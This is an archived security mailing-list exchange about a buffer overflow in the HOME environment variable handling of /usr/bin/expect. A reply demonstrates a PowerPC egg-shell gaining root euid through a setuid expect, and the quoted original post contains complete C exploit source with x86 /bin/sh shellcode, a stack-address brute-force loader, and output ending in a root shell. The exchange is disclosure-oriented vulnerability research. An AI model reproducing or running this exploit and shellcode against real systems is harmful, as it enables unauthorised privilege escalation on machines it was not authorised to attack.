Vulnerability Development: Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]]

[Charles Stevenson <core () ezlink com>]

Kevin,

Here's the PPC shellcode info you asked for:

This is mainly a post of my PowerPC exploit efforts... anyways... Just
for grins I tested a scenario under Debian PowerPC GNU/Linux with:

ii  expect5.31     5.31.8-3       A program that "talks" to other
programs.

[-(core () euclid:~/sploits/shellcode/reet)> sudo chmod 4755 /usr/bin/expect

[-(core () euclid:~/sploits/shellcode/reet)> ls -lL /usr/bin/expect
-rwsr-xr-x    1 root     root         4328 Sep 20  2000 /usr/bin/expect
[-(core () euclid:~/sploits/shellcode/reet)> ./eggshell 512
[ Buffer size:  512             Egg size:       2048    Aligment:
0]
[ Address:      0x100111f8      Offset:         0
]
sh-2.05$ id
uid=1000(core) gid=1000(core)
groups=1000(core),4(adm),24(cdrom),29(audio)
sh-2.05$ /usr/bin/expect
expect1.1> id
uid=1000(core) gid=1000(core) euid=0(root)
groups=1000(core),4(adm),24(cdrom),29(audio)
expect1.2>

If you find a program that calls expect suid let me know ;-)

Best Regards,
Charles Stevenson

P.S. the "reet" tools I wrote to add PowerPC support are based on Aleph
One's smashstack code.  It's available at:
http://www.ezlink.com/~core/files/reet.tar.gz (Comments welcome:)

> I have found an overflow in and coded the exploit code for several
> versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am
> unable to think of a situation where this would be useful due to the
> fact that expect is not suid...can anyone help me determine if this is
> exploitable to obtain root? Perhaps a suid expect script could be
> exploited? or maybe something like suid kppp which calls expect as a
> helper program?
>
> [root () linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
> [root () linux elguapo]# expect
> Segmentation fault (core dumped)
>
> -Kevin Finisterre
> dotslash () snosoft com
> --------------54785D81E19EEAA4D65A5A40
> Content-Transfer-Encoding: 7bit
> Content-Type: text/plain; charset=us-ascii;
>  name="expect.c"
> Content-Disposition: inline;
>  filename="expect.c"
>
> //krfinisterre () checkfree com or dotslash () snosoft com
> //this is output from my brute script...
> //722
> //Stack pointer: 0xbffffa18
> //       Offset: 0x2d3
> //  Return addr: 0xbffff745
> //stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
> $3
> $L
> //723
> //Stack pointer: 0xbffffa18
> //       Offset: 0x2d4
> //  Return addr: 0xbffff744
> //sh-2.04#
> //note that I was root when I ran this ... expect is not suid
>
> #define BUFFERSIZE 533
>
> unsigned long sp(void)
> {
>         __asm__("movl %esp, %eax");
> }
>
> int main(int argc,char **argv)
> {
>   char hell[] =
>         "\x29\xc0"
>         "\x29\xc0"
>         "\xb0\x47"
>         "\x29\xdb"
>         "\xb3\x0c"
>         "\x89\xd9"
>         "\xcd\x80"
>         "\x5e"
>         "\x29\xc0"
>         "\x88\x46\x07"
>         "\x89\x46\x0c"
>         "\x89\x76\x08"
>         "\xb0\x0b"
>         "\x87\xf3"
>         "\x8d\x4b\x08"
>         "\x8d\x53\x0c"
>         "\xcd\x80"
>         "\xe8\xe3\xff\xff\xff"
>         "\x2f\x62\x69\x6e\x2f\x73\x68";
>         int i;
>         int offset;
>         long esp;
>         long ret;
>         long *addr_ptr;
>         char *buffer, *ptr;
>         offset = atoi(argv[1]);
>         esp = sp();
>         ret = esp-offset;
>
>         if(!(buffer = malloc(BUFFERSIZE)))
>         {
>                 printf("oops\n");
>                 exit(-1);
>         }
>
>         ptr = buffer;
>         addr_ptr = (long *)ptr;
>         for (i=0; i<BUFFERSIZE; i+=4)
>                 *(addr_ptr++) = ret;
>
>         for (i=0; i<BUFFERSIZE/2; i++)
>                 buffer[i] = '\xeb02';
>
>         ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
>         for(i=0; i<strlen(hell); i++)
>                 *(ptr++) = hell[i];
>
>         buffer[BUFFERSIZE-1] = 0;
>
>         setenv("HOME", buffer, 1);
>         execlp("/usr/bin/expect", 0);
> }
>
> --------------54785D81E19EEAA4D65A5A40--